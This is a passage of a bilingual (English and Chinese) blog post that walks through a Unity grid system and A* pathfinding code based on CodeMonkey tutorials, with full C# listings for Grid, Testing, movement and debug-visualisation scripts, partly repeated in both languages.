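    Debug.Log("Grid cell changed: (" + e.x + ", " + e.y + ")");
};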

Grid.cs full code

Some function names were also renamed to match the new semantics; the complete Grid.cs:

using UnityEngine;
using CodeMonkey.Utils;
using System;

public class Grid<TGridObject>
{
    public event EventHandler<OnGridValueChangedEventArgs> OnGridValueChanged;
    public class OnGridValueChangedEventArgs : EventArgs
    {
        public int x;
        public int y;
    }

    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private TGridObject[,] gridArray;

    public Grid(int width, int height, float cellSize, Vector3 originPosition, Func<Grid<TGridObject>, int, int, TGridObject> createGridObject)
    {
        this.width = width;
        this.height = height;
        this.cellSize = cellSize;
        this.originPosition = originPosition;

        gridArray = new TGridObject[width, height];

        for (int x = 0; x < gridArray.GetLength(0); x++)
        {
            for (int y = 0; y < gridArray.GetLength(1); y++)
            {
                gridArray[x, y] = createGridObject(this, x, y);
            }
        }

        bool showDebug = true;
        if (showDebug)
        {
            TextMesh[,] debugTextArray = new TextMesh[width, height];
            for (int x = 0; x < gridArray.GetLength(0); x++)
            {
                for (int y = 0; y < gridArray.GetLength(1); y++)
                {
                    debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y]?.ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
                    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
                    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
                }
            }
            Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
            Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);

            OnGridValueChanged += (object sender, OnGridValueChangedEventArgs eventArgs) =>
            {
                debugTextArray[eventArgs.x, eventArgs.y].text = gridArray[eventArgs.x, eventArgs.y]?.ToString();
            };
        }
    }

    private Vector3 GetWorldPosition(int x, int y)
    {
        return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
        x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
        y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    public void SetGridObject(int x, int y, TGridObject value)
    {
        if (x >= 0 && y >= 0 && x < width && y < height)
        {
            gridArray[x, y] = value;
            if (OnGridValueChanged != null)
            {
                OnGridValueChanged(this, new OnGridValueChangedEventArgs { x = x, y = y });
            }
        }
    }

    public void TriggerGridObjectChanged(int x, int y)
    {
        if (OnGridValueChanged != null)
        {
            OnGridValueChanged(this, new OnGridValueChangedEventArgs { x = x, y = y });
        }
    }

    public void SetGridObject(Vector3 worldPosition, TGridObject value)
    {
        int x, y;
        GetXY(worldPosition, out x, out y);
        SetGridObject(x, y, value);
    }

    public TGridObject GetGridObject(int x, int y)
    {
        if (x >= 0 && y >= 0 && x < width && y < height)
        {
            return gridArray[x, y];
        }
        else
        {
            return default(TGridObject);
        }
    }

    public TGridObject GetGridObject(Vector3 worldPosition)
    {
        int x, y;
        GetXY(worldPosition, out x, out y);
        return GetGridObject(x, y);
    }
}

Designing and using a HeatMapGridObject class

Now you can design your own class in Testing.cs and store whatever data you want in the grid:

(Since I don't need a heatmap, I didn't copy the heatmap-specific code from the video.)

The complete Testing.cs defining and using the HeatMapGridObject class:

using UnityEngine;
using CodeMonkey.Utils;

public class Testing : MonoBehaviour
{
    private Grid<HeatMapGridObject> grid;
    // Start is called before the first frame update
    void Start()
    {
        grid = new Grid<HeatMapGridObject>(4, 2, 10f, new Vector3(20, 0), (Grid<HeatMapGridObject> g, int x, int y) => new HeatMapGridObject(g, x, y));
    }

    private void Update()
    {
        if (Input.GetMouseButtonDown(0))
        {
            Vector3 position = UtilsClass.GetMouseWorldPosition();
            HeatMapGridObject heatMapGridObject = grid.GetGridObject(position);
            if (heatMapGridObject != null)
            {
                heatMapGridObject.AddValue(5);
            }
        }
    }

    public class HeatMapGridObject
    {
        private const int MIN = 0;
        private const int MAX = 100;

        private Grid<HeatMapGridObject> grid;
        private int x;
        private int y;
        private int value;

        public HeatMapGridObject(Grid<HeatMapGridObject> grid, int x, int y)
        {
            this.grid = grid;
            this.x = x;
            this.y = y;
        }

        public void AddValue(int addValue)
        {
            value += addValue;
            // Mathf.Clamp returns the clamped value; it must be assigned back,
            // otherwise the MIN/MAX limits have no effect.
            value = Mathf.Clamp(value, MIN, MAX);
            grid.TriggerGridObjectChanged(x, y);
        }

        public float GetValueNormalized()
        {
            return (float)value / MAX;
        }

        public override string ToString()
        {
            return value.ToString();
        }
    }
}

Result:

[figure: left-clicking adds 5 to the value of the cell under the mouse]

Designing and using a StringGridObject class

The complete Testing.cs defining and using the StringGridObject class:

using UnityEngine;
using CodeMonkey.Utils;

public class Testing : MonoBehaviour
{
    private Grid<StringGridObject> stringGrid;
    // Start is called before the first frame update
    void Start()
    {
        stringGrid = new Grid<StringGridObject>(4, 2, 10f, new Vector3(20, 0), (Grid<StringGridObject> g, int x, int y) => new StringGridObject(g, x, y));
    }

    private void Update()
    {
        Vector3 position = UtilsClass.GetMouseWorldPosition();
        if (Input.GetKeyDown(KeyCode.A)) { stringGrid.GetGridObject(position).AddLetter("A"); }
        if (Input.GetKeyDown(KeyCode.B)) { stringGrid.GetGridObject(position).AddLetter("B"); }
        if (Input.GetKeyDown(KeyCode.C)) { stringGrid.GetGridObject(position).AddLetter("C"); }

        if (Input.GetKeyDown(KeyCode.Alpha1)) { stringGrid.GetGridObject(position).AddNumber("1"); }
        if (Input.GetKeyDown(KeyCode.Alpha2)) { stringGrid.GetGridObject(position).AddNumber("2"); }
        if (Input.GetKeyDown(KeyCode.Alpha3)) { stringGrid.GetGridObject(position).AddNumber("3"); }
    }

    public class StringGridObject
    {
        private Grid<StringGridObject> grid;
        private int x;
        private int y;

        public string letters;
        public string numbers;

        public StringGridObject(Grid<StringGridObject> grid, int x, int y)
        {
            this.grid = grid;
            this.x = x;
            this.y = y;
            letters = "";
            numbers = "";
        }

        public void AddLetter(string letter)
        {
            letters += letter;
            grid.TriggerGridObjectChanged(x, y);
        }

        public void AddNumber(string number)
        {
            numbers += number;
            grid.TriggerGridObjectChanged(x, y);
        }

        public override string ToString()
        {
            return letters + "\n" + numbers;
        }
    }
}

Result:

[figure: pressing A/B/C or 1/2/3 appends the corresponding letter/digit to the cell under the mouse]

The A* algorithm

    A* Pathfinding in Unity

This one really is a lot of code… I'll just copy it.

Scene object layout

[figure: scene object layout]

CharacterPathfindingMovementHandler: drives the character's walking

using System.Collections.Generic;
using UnityEngine;
using V_AnimationSystem;
using CodeMonkey.Utils;

public class CharacterPathfindingMovementHandler : MonoBehaviour {

    private const float speed = 40f;

    private V_UnitSkeleton unitSkeleton;
    private V_UnitAnimation unitAnimation;
    private AnimatedWalker animatedWalker;
    private int currentPathIndex;
    private List<Vector3> pathVectorList;

    private void Start() {
        Transform bodyTransform = transform.Find("Body");
        unitSkeleton = new V_UnitSkeleton(1f, bodyTransform.TransformPoint, (Mesh mesh) => bodyTransform.GetComponent<MeshFilter>().mesh = mesh);
        unitAnimation = new V_UnitAnimation(unitSkeleton);
        animatedWalker = new AnimatedWalker(unitAnimation, UnitAnimType.GetUnitAnimType("dMarine_Idle"), UnitAnimType.GetUnitAnimType("dMarine_Walk"), 1f, 1f);
    }

    private void Update() {
        HandleMovement();
        unitSkeleton.Update(Time.deltaTime);

        if (Input.GetMouseButtonDown(0)) {
            SetTargetPosition(UtilsClass.GetMouseWorldPosition());
        }
    }

    private void HandleMovement() {
        if (pathVectorList != null) {
            Vector3 targetPosition = pathVectorList[currentPathIndex];
            if (Vector3.Distance(transform.position, targetPosition) > 1f) {
                Vector3 moveDir = (targetPosition - transform.position).normalized;

                float distanceBefore = Vector3.Distance(transform.position, targetPosition);
                animatedWalker.SetMoveVector(moveDir);
                transform.position = transform.position + moveDir * speed * Time.deltaTime;
            } else {
                // Reached the current waypoint; advance to the next one or stop.
                currentPathIndex++;
                if (currentPathIndex >= pathVectorList.Count) {
                    StopMoving();
                    animatedWalker.SetMoveVector(Vector3.zero);
                }
            }
        } else {
            animatedWalker.SetMoveVector(Vector3.zero);
        }
    }

    private void StopMoving() {
        pathVectorList = null;
    }

    public Vector3 GetPosition() {
        return transform.position;
    }

    public void SetTargetPosition(Vector3 targetPosition) {
        currentPathIndex = 0;
        pathVectorList = Pathfinding.Instance.FindPath(GetPosition(), targetPosition);

        // Drop the first node: it is the cell the character is already standing on.
        if (pathVectorList != null && pathVectorList.Count > 1) {
            pathVectorList.RemoveAt(0);
        }
    }
}

PathfindingDebugStepVisual: step-by-step visualization of the pathfinding algorithm

using System;
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using CodeMonkey.Utils;

public class PathfindingDebugStepVisual : MonoBehaviour {

    public static PathfindingDebugStepVisual Instance { get; private set; }

    [SerializeField] private Transform pfPathfindingDebugStepVisualNode;
    private List<Transform> visualNodeList;
    private List<GridSnapshotAction> gridSnapshotActionList;
    private bool autoShowSnapshots;
    private float autoShowSnapshotsTimer;
    private Transform[,] visualNodeArray;

    private void Awake() {
        Instance = this;
        visualNodeList = new List<Transform>();
        gridSnapshotActionList = new List<GridSnapshotAction>();
    }

    public void Setup(Grid<PathNode> grid) {
        visualNodeArray = new Transform[grid.GetWidth(), grid.GetHeight()];

        for (int x = 0; x < grid.GetWidth(); x++) {
            for (int y = 0; y < grid.GetHeight(); y++) {
                Vector3 gridPosition = new Vector3(x, y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
                Transform visualNode = CreateVisualNode(gridPosition);
                visualNodeArray[x, y] = visualNode;
                visualNodeList.Add(visualNode);
            }
        }
        HideNodeVisuals();
    }

    private void Update() {
        // Space steps through one snapshot; Return plays them back automatically.
        if (Input.GetKeyDown(KeyCode.Space)) {
            ShowNextSnapshot();
        }

        if (Input.GetKeyDown(KeyCode.Return)) {
            autoShowSnapshots = true;
        }
        if (autoShowSnapshots) {
            float autoShowSnapshotsTimerMax = .05f;
            autoShowSnapshotsTimer -= Time.deltaTime;
            if (autoShowSnapshotsTimer <= 0f) {
                autoShowSnapshotsTimer += autoShowSnapshotsTimerMax;
                ShowNextSnapshot();
                if (gridSnapshotActionList.Count == 0) {
                    autoShowSnapshots = false;
                }
            }
        }
    }

    private void ShowNextSnapshot() {
        if (gridSnapshotActionList.Count > 0) {
            GridSnapshotAction gridSnapshotAction = gridSnapshotActionList[0];
            gridSnapshotActionList.RemoveAt(0);
            gridSnapshotAction.TriggerAction();
        }
    }

    public void ClearSnapshots() {
        gridSnapshotActionList.Clear();
    }

    public void TakeSnapshot(Grid<PathNode> grid, PathNode current, List<PathNode> openList, List<PathNode> closedList) {
        GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
        gridSnapshotAction.AddAction(HideNodeVisuals);

        for (int x = 0; x < grid.GetWidth(); x++) {
            for (int y = 0; y < grid.GetHeight(); y++) {
                PathNode pathNode = grid.GetGridObject(x, y);

                int gCost = pathNode.gCost;
                int hCost = pathNode.hCost;
                int fCost = pathNode.fCost;
                Vector3 gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
                bool isCurrent = pathNode == current;
                bool isInOpenList = openList.Contains(pathNode);
                bool isInClosedList = closedList.Contains(pathNode);
                int tmpX = x;
                int tmpY = y;

                gridSnapshotAction.AddAction(() => {
                    Transform visualNode = visualNodeArray[tmpX, tmpY];
                    SetupVisualNode(visualNode, gCost, hCost, fCost);

                    // Color code: gray = untouched, blue = open list, red = closed list, green = current node.
                    Color backgroundColor = UtilsClass.GetColorFromString("636363");
                    if (isInClosedList) {
                        backgroundColor = new Color(1, 0, 0);
                    }
                    if (isInOpenList) {
                        backgroundColor = UtilsClass.GetColorFromString("009AFF");
                    }
                    if (isCurrent) {
                        backgroundColor = new Color(0, 1, 0);
                    }

                    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
                });
            }
        }

        gridSnapshotActionList.Add(gridSnapshotAction);
    }

    public void TakeSnapshotFinalPath(Grid<PathNode> grid, List<PathNode> path) {
        GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
        gridSnapshotAction.AddAction(HideNodeVisuals);

        for (int x = 0; x < grid.GetWidth(); x++) {
            for (int y = 0; y < grid.GetHeight(); y++) {
                PathNode pathNode = grid.GetGridObject(x, y);

                int gCost = pathNode.gCost;
                int hCost = pathNode.hCost;
                int fCost = pathNode.fCost;
                Vector3 gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
                bool isInPath = path.Contains(pathNode);
                int tmpX = x;
                int tmpY = y;

                gridSnapshotAction.AddAction(() => {
                    Transform visualNode = visualNodeArray[tmpX, tmpY];
                    SetupVisualNode(visualNode, gCost, hCost, fCost);

                    Color backgroundColor;
                    if (isInPath) {
                        backgroundColor = new Color(0, 1, 0);
                    } else {
                        backgroundColor = UtilsClass.GetColorFromString("636363");
                    }

                    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
                });
            }
        }

        gridSnapshotActionList.Add(gridSnapshotAction);
    }

    private void HideNodeVisuals() {
        foreach (Transform visualNodeTransform in visualNodeList) {
            SetupVisualNode(visualNodeTransform, 9999, 9999, 9999);
        }
    }

    private Transform CreateVisualNode(Vector3 position) {
        Transform visualNodeTransform = Instantiate(pfPathfindingDebugStepVisualNode, position, Quaternion.identity);
        return visualNodeTransform;
    }

    private void SetupVisualNode(Transform visualNodeTransform, int gCost, int hCost, int fCost) {
        if (fCost < 1000) {
            visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText(gCost.ToString());
            visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText(hCost.ToString());
            visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText(fCost.ToString());
        } else {
            // Cost 9999 is used as a "hidden" sentinel; blank out the labels.
            visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText("");
            visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText("");
            visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText("");
        }
    }

    private class GridSnapshotAction {

        private Action action;

        public GridSnapshotAction() {
            action = () => { };
        }

        public void AddAction(Action action) {
            this.action += action;
        }

        public void TriggerAction() {
            action();
        }
    }
}


Testing.cs

Testing.cs source code:

using System.Collections.Generic;
using UnityEngine;
using CodeMonkey.Utils;
using CodeMonkey;

public class Testing : MonoBehaviour {

    [SerializeField] private PathfindingDebugStepVisual pathfindingDebugStepVisual;
    [SerializeField] private PathfindingVisual pathfindingVisual;
    [SerializeField] private CharacterPathfindingMovementHandler characterPathfinding;
    private Pathfinding pathfinding;

    private void Start() {
        pathfinding = new Pathfinding(20, 10);
        pathfindingDebugStepVisual.Setup(pathfinding.GetGrid());
        pathfindingVisual.SetGrid(pathfinding.GetGrid());
    }

    private void Update() {
        if (Input.GetMouseButtonDown(0)) {
            Vector3 mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
            pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
            List<PathNode> path = pathfinding.FindPath(0, 0, x, y);
            if (path != null) {
                // Draw the found path as green debug lines between node centers.
                for (int i = 0; i < path.Count - 1; i++) {
                    Debug.DrawLine(new Vector3(path[i].x, path[i].y) * 10f + Vector3.one * 5f, new Vector3(path[i + 1].x, path[i + 1].y) * 10f + Vector3.one * 5f, Color.green, 5f);
                }
            }
            characterPathfinding.SetTargetPosition(mouseWorldPosition);
        }

        if (Input.GetMouseButtonDown(1)) {
            // Right-click toggles walkability of the cell under the mouse.
            Vector3 mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
            pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
            pathfinding.GetNode(x, y).SetIsWalkable(!pathfinding.GetNode(x, y).isWalkable);
        }
    }

}
    ]]>
    + 相关资源

    ​ 在本科毕设的时候使用到的一个 Unity 的网格系统, 但是那时候没有做笔记有点忘了 orz, 现在为了做算法大作业再拿出来用用…只看了前三节的部分实现 A*算法就行.

    ​ 这个 CodeMonkey 的代码能力还是很牛逼的, 我不介意重学一遍

    正文

    网格系统

    Grid System in Unity (Heatmap, Pathfinding, Building Area)

    设计 Grid 类

    建立了一个 Grid 类, 包含如下元素:

    • 宽 width
    • 高 height
    • 网格大小 cellSize
    • 起始位置 originPosition
    • 网格数组 gridArray
    • debug 用数组 debugTextArray
    1
    2
    3
    4
    5
    6
    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private int[,] gridArray;
    private TextMesh[,] debugTextArray;

    设计构造函数

    设计构造函数 public Grid(int width, int height, float cellSize, Vector3 originPosition)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    public Grid(int width, int height, float cellSize, Vector3 originPosition)
    {
    this.width = width;
    this.height = height;
    this.cellSize = cellSize;
    this.originPosition = originPosition;

    gridArray = new int[width, height];
    debugTextArray = new TextMesh[width, height];

    for (int x = 0; x < gridArray.GetLength(0); x++)
    {
    for (int y = 0; y < gridArray.GetLength(1); y++)
    {
    debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y].ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
    }
    }
    Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);
    }

    坐标转换

    此时有两种坐标:

    • 网格坐标 XY (数组的下标)
    • 游戏中的世界坐标 WorldPosition

    设计两个函数用于两种坐标之间的转换:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    private Vector3 GetWorldPosition(int x, int y)
    {
    return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
    x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
    y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    设置网格系统中的值

    根据坐标设置网格系统中的值:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    public void SetValue(int x, int y, int value)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    gridArray[x, y] = value;
    debugTextArray[x, y].text = gridArray[x, y].ToString();
    }
    }

    public void SetValue(Vector3 worldPosition, int value)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    SetValue(x, y, value);
    }

    获取网格系统中的值

    根据坐标获取网格系统中的值:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    public int GetValue(int x, int y)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    return gridArray[x, y];
    }
    else
    {
    return 0;
    }
    }

    public int GetValue(Vector3 worldPosition)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    return GetValue(x, y);
    }

    鼠标交互

    Testing.cs 中使用 Grid 类, 使用鼠标可以修改/获取网格系统中的值. 下面是 Testing.cs 的完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    using UnityEngine;
    using CodeMonkey.Utils;

    public class Testing : MonoBehaviour
    {
    private Grid grid;
    // Start is called before the first frame update
    void Start()
    {
    grid = new Grid(4, 2, 10f, new Vector3(20, 0));
    }

    private void Update()
    {
    if (Input.GetMouseButtonDown(0))
    {
    grid.SetValue(UtilsClass.GetMouseWorldPosition(), 56);
    }
    if (Input.GetMouseButtonDown(1))
    {
    Debug.Log(grid.GetValue(UtilsClass.GetMouseWorldPosition()));
    }
    }
    }

    Grid.cs 完整代码

    Grid.cs 的完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    using UnityEngine;
    using CodeMonkey.Utils;

    public class Grid
    {
    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private int[,] gridArray;
    private TextMesh[,] debugTextArray;

    public Grid(int width, int height, float cellSize, Vector3 originPosition)
    {
    this.width = width;
    this.height = height;
    this.cellSize = cellSize;
    this.originPosition = originPosition;

    gridArray = new int[width, height];
    debugTextArray = new TextMesh[width, height];

    for (int x = 0; x < gridArray.GetLength(0); x++)
    {
    for (int y = 0; y < gridArray.GetLength(1); y++)
    {
    debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y].ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
    }
    }
    Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);
    }
    private Vector3 GetWorldPosition(int x, int y)
    {
    return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
    x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
    y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    public void SetValue(int x, int y, int value)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    gridArray[x, y] = value;
    debugTextArray[x, y].text = gridArray[x, y].ToString();
    }
    }

    public void SetValue(Vector3 worldPosition, int value)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    SetValue(x, y, value);
    }

    public int GetValue(int x, int y)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    return gridArray[x, y];
    }
    else
    {
    return 0;
    }
    }

    public int GetValue(Vector3 worldPosition)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    return GetValue(x, y);
    }
    }

    Powerful Generics Added! Grid System in Unity (Terraria, Minesweeper, Tilemap)

    使用泛型

    大概意思就是修改上一章的Grid.cs, 添加泛型, 增加代码的重用性

    将类名修改为:

    1
    public class Grid<TGridObject>

    网格数组 gridArray 中的类型不再使用 int, 而是使用<TGridObject>:

    1
    private TGridObject[,] gridArray;

    构造函数使用了委托Func<Grid<TGridObject>, int, int, TGridObject> createGridObject:

    1
    public Grid(int width, int height, float cellSize, Vector3 originPosition, Func<Grid<TGridObject>, int, int, TGridObject> createGridObject)

    使用了事件 event, 但是我没学过 orz 就照抄了…

    1
    2
    3
    4
    5
    6
    public event EventHandler<OnGridValueChangedEventArgs> OnGridValueChanged;
    public class OnGridValueChangedEventArgs : EventArgs
    {
    public int x;
    public int y;
    }

    Grid.cs 完整代码

    一些函数的名称也因语义做相关改变, 附Grid.cs的完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    using UnityEngine;
    using CodeMonkey.Utils;
    using System;

    public class Grid<TGridObject>
    {
    public event EventHandler<OnGridValueChangedEventArgs> OnGridValueChanged;
    public class OnGridValueChangedEventArgs : EventArgs
    {
    public int x;
    public int y;
    }

    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private TGridObject[,] gridArray;

    public Grid(int width, int height, float cellSize, Vector3 originPosition, Func<Grid<TGridObject>, int, int, TGridObject> createGridObject)
    {
    this.width = width;
    this.height = height;
    this.cellSize = cellSize;
    this.originPosition = originPosition;

    gridArray = new TGridObject[width, height];

    for(int x = 0; x < gridArray.GetLength(0); x++)
    {
    for(int y = 0; y < gridArray.GetLength(1); y++)
    {
    gridArray[x, y] = createGridObject(this, x, y);
    }
    }

    bool showDebug = true;
    if (showDebug)
    {
    TextMesh[,] debugTextArray = new TextMesh[width, height];
    for (int x = 0; x < gridArray.GetLength(0); x++)
    {
    for (int y = 0; y < gridArray.GetLength(1); y++)
    {
    debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y]?.ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
    }
    }
    Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);

    OnGridValueChanged += (object sender, OnGridValueChangedEventArgs eventArgs) =>
    {
    debugTextArray[eventArgs.x, eventArgs.y].text = gridArray[eventArgs.x, eventArgs.y]?.ToString();
    };
    }
    }
    private Vector3 GetWorldPosition(int x, int y)
    {
    return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
    x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
    y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    public void SetGridObject(int x, int y, TGridObject value)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    gridArray[x, y] = value;
    if (OnGridValueChanged != null)
    {
    OnGridValueChanged(this, new OnGridValueChangedEventArgs { x = x, y = y });
    }
    }
    }

    public void TriggerGridObjectChanged(int x, int y)
    {
    if (OnGridValueChanged != null)
    {
    OnGridValueChanged(this, new OnGridValueChangedEventArgs { x = x, y = y });
    }
    }

    public void SetGridObject(Vector3 worldPosition, TGridObject value)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    SetGridObject(x, y, value);
    }

    public TGridObject GetGridObject(int x, int y)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    return gridArray[x, y];
    }
    else
    {
    return default(TGridObject);
    }
    }

    public TGridObject GetGridObject(Vector3 worldPosition)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    return GetGridObject(x, y);
    }
    }

    设计并使用 HeatMapGridObject 类

    此时就可以在 Testing.cs中自行设计类, 在网格系统中存储自己想要存储的数据:

    (因为我不需要使用热图, 所以没有按照视频搬运热图相关的代码)

    设计并使用 HeatMapGridObject 类的完整 Testing.cs 代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    using UnityEngine;
    using CodeMonkey.Utils;

    public class Testing : MonoBehaviour
    {
    private Grid<HeatMapGridObject> grid;
    // Start is called before the first frame update
    void Start()
    {
    grid = new Grid<HeatMapGridObject>(4, 2, 10f, new Vector3(20, 0), (Grid<HeatMapGridObject> g, int x, int y) => new HeatMapGridObject(g, x, y));
    }

    private void Update()
    {
    if (Input.GetMouseButtonDown(0))
    {
    Vector3 position = UtilsClass.GetMouseWorldPosition();
    HeatMapGridObject heatMapGridObject = grid.GetGridObject(position);
    if (heatMapGridObject != null)
    {
    heatMapGridObject.AddValue(5);
    }
    }
    }

    public class HeatMapGridObject
    {
    private const int MIN = 0;
    private const int MAX = 100;

    private Grid<HeatMapGridObject> grid;
    private int x;
    private int y;
    private int value;

    public HeatMapGridObject(Grid<HeatMapGridObject> grid, int x, int y)
    {
    this.grid = grid;
    this.x = x;
    this.y = y;
    }

    public void AddValue(int addValue)
    {
    value += addValue;
    // Mathf.Clamp returns the clamped result; it must be assigned back, or the clamp has no effect.
    value = Mathf.Clamp(value, MIN, MAX);
    grid.TriggerGridObjectChanged(x, y);
    }

    public float GetValueNormalized()
    {
    return (float)value / MAX;
    }

    public override string ToString()
    {
    return value.ToString();
    }
    }
    }

    Result:

    (screenshot)
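    Since the heat-map visuals were skipped, GetValueNormalized() is never consumed above. As a minimal sketch of what it is for (my own illustration, not code from the video), a helper like this inside Testing could tint one SpriteRenderer per cell; cellRenderers is a hypothetical array assumed to be created elsewhere, and Grid<TGridObject> is assumed to expose the GetWidth()/GetHeight() getters used by the pathfinding code later in this post:

    // Hypothetical sketch: tint each cell from black (value 0) to red (value MAX).
    private void UpdateHeatMapVisual(SpriteRenderer[,] cellRenderers)
    {
    for (int x = 0; x < grid.GetWidth(); x++)
    {
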